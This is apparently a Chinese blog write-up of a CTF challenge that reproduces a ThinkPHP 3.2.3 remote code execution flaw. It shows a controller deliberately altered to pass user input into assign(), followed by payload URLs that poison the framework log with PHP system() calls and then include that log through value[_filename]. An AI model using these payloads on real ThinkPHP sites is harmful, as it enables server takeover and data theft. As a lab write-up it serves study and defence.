[PHP知识库]wp 篇 DASCTF Thinkphp 3.2.3RCE复现

一，概述

在我开始这篇博客之前，请允许我说明一下"wp篇"存在的意义——它的存在主要是为了丰富我的“小破站”而存在的，你没听错，我还有一个小破站，如果你想要看看的话，可以私信我。（为什么不公开？因为，我并不是经常维护，而且里面放的题目都需要手动打开…总之就是怕麻烦）。
好了，接下来进入正题。首先给大家推荐这篇漏洞通报 ThinkPHP3.2.x RCE漏洞通报 。
其次，至于DASCTF这道easythinkphp，参加了比赛的都知道怎么回事了，没有参加的也没事，可以根据下面的阐述自己复现（大佬请勿入坑，不然你会发现我是在浪费你的时间）。

二，复现流程

1下载

下载地址

2构建

（1）解压之后放在环境里即可，然后授权。
（2）访问url/index.php。
（3）修改/Application/Home/Controller/IndexController.class.php如下

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function index($value=''){
		$this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} body{ background: #fff; font-family: "微软雅黑"; color: #333;font-size:24px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.8em; font-size: 36px } a,a:hover{color:blue;}</style><div style="padding: 24px 48px;"> <h1>:)</h1><p>欢迎使用 <b>ThinkPHP</b>！</p><br/>版本 V{$Think.version}</div><thinkad id="ad_55e75dfae343f5a1"></thinkad>','utf-8');
        $this->assign($value);
        $this->show();
    }
}

（4）创建对应的模板文件
\Application\Home\View\Index\index.html

3效果

三，wp和“坑”

1坑

首先，把“坑”讲了吧，其实就是利用pl时如果不用burp的话，日志里的pl会呈现url编码一次的字符串，这样的pl就是失败的了。
其次，经过几轮简单的尝试就可以清晰的了解整个流程了，漏洞报告里也写的非常明确了，这里就不再赘述。

2wp

两种方向，其一，目录遍历，其二，木马RCE。
这里展示第一种，第二种其实时换汤不换药了。

/index.php?m=--><?=phpinfo();?>
/index.php?m=--><?=system('ls');?>
/index.php?m=--><?=system('cat$IFS$9`ls` ');?>
/index.php?m=--><?=system('ls$IFS$9/');?>
/index.php?m=--><?=system('cat$IFS$9/flag');?>
#上面先传入log文件，下面文件包含。
/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_08_09.log

3效果对比

左两栏为原题查看根目录时的截图，右两栏为复现查看当前目录时的截图。